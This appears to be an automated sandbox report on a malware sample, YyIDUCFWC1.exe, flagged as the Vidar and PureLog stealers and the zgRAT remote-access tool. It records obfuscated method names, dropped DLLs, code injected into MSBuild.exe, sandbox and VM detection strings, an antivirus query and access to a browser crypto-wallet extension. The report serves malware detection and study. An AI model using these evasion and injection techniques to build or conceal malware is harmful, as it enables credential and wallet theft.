                            Source: YyIDUCFWC1.exe, ClientHeartBeat.csHigh entropy of concatenated method names: '_003CRunHeartBeat_003Eb__2', '_003CRunHeartBeat_003Eb__5', '_003CChangeServerConnectionState_003Eb__18', '_003CGetNextClientInstance_003Eb__1c', '_003CUnregisterClient_003Eb__23', 'RunHeartBeat', 'RunClientChecks', 'CheckServerReconnection', 'ChangeServerConnectionState', 'GetNextClientInstance'
                            Source: YyIDUCFWC1.exe, AccessLevelsSet.csHigh entropy of concatenated method names: 'AddAccessLevelRow', 'AddAccessLevelRow', 'Clone', 'CreateInstance', 'InitVars', 'InitClass', 'NewAccessLevelRow', 'NewRowFromBuilder', 'GetRowType', 'OnRowChanged'
                            Source: YyIDUCFWC1.exe, EventView.csHigh entropy of concatenated method names: 'VaMcMrvcxjskXqJcyAu', 'VWedAqvZu0IinNUcmHM', 'mYUvsEvEXQwrXQZwd5c', 'xXs6euvi8x4jSIfmTxW', 'Mv1ZLDv8bNktrRIvW0s', 'gd91ChvQy6x9g6lVj8y', 'Q0w6UGvGZrXC2QO5H9L', 'D2YH2Wv2YqdPWVGxRVw', 'qiqwyavAaXPnHMuRpnB', 'mq2BjxvS08IURxeCXIp'
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeFile created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004185A0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004185A0
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            barindex
                            Yara detected AntiVM3
                            Source: Yara matchFile source: Process Memory Space: YyIDUCFWC1.exe PID: 5480, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6360, type: MEMORYSTR
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: MSBuild.exeBinary or memory string: DIR_WATCH.DLL
                            Source: MSBuild.exeBinary or memory string: SBIEDLL.DLL
                            Source: MSBuild.exeBinary or memory string: API_LOG.DLL
                            Source: MSBuild.exe, 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeMemory allocated: 2C00000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeMemory allocated: 2DA0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeMemory allocated: 4DA0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 5.6 %
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exe TID: 6576Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exe TID: 6740Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00410370 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 004104A2h1_2_00410370
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040B030 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040B030
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004011E0 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004011E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040D320 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040D320
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004164A0 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,DeleteFileA,FindNextFileA,FindClose,1_2_004164A0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417550 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00417550
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040A530 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040A530
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00416CF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00416CF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417140 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00417140
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040A980 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040A980
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004168E0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,1_2_004168E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00410540 GetSystemInfo,wsprintfA,1_2_00410540
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeThread delayed: delay time: 30000Jump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware)g
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeAPI call chain: ExitProcess graph end nodegraph_0-58270
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_1-71686
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_1-72767
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF3948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CF3948B
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CEEB6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,0_2_6CEEB6C0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00411020 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,1_2_00411020
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF3948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CF3948B
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF3B144 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CF3B144
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041A68F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0041A68F
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041F768 SetUnhandledExceptionFilter,1_2_0041F768
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041BBB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041BBB7
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBDAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6CBDAC62
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Allocates memory in foreign processes
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                            Injects a PE file into a foreign processes
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                            Searches for specific processes (likely to inject)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00411BD0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_00411BD0
                            Writes to foreign memory regions
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 423000Jump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42E000Jump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 641000Jump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 642000Jump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: ACB008Jump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC24760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,1_2_6CC24760
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB01C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,1_2_6CB01C30
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF384B0 cpuid 0_2_6CF384B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00410370
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoA,LocalFree,1_2_004103E9
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeQueries volume information: C:\Users\user\Desktop\YyIDUCFWC1.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF3A25A GetSystemTimeAsFileTime,__aulldiv,0_2_6CF3A25A
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00410220 GetProcessHeap,HeapAlloc,GetUserNameA,1_2_00410220
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00410300 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,1_2_00410300
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB28390 NSS_GetVersion,1_2_6CB28390
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: YyIDUCFWC1.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.YyIDUCFWC1.exe.680000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1691360547.0000000000682000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Yara detected Vidar
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Yara detected Vidar stealer
                            Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.YyIDUCFWC1.exe.3e0c1e0.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.YyIDUCFWC1.exe.3e3f810.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.YyIDUCFWC1.exe.3e3f810.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.YyIDUCFWC1.exe.3e0c1e0.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.1701548677.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1701132649.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1701548677.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1709833273.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: YyIDUCFWC1.exe PID: 5480, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6360, type: MEMORYSTR
                            Yara detected zgRAT
                            Source: Yara matchFile source: YyIDUCFWC1.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.YyIDUCFWC1.exe.680000.0.unpack, type: UNPACKEDPE
                            Found many strings related to Crypto-Wallets (likely being stolen)
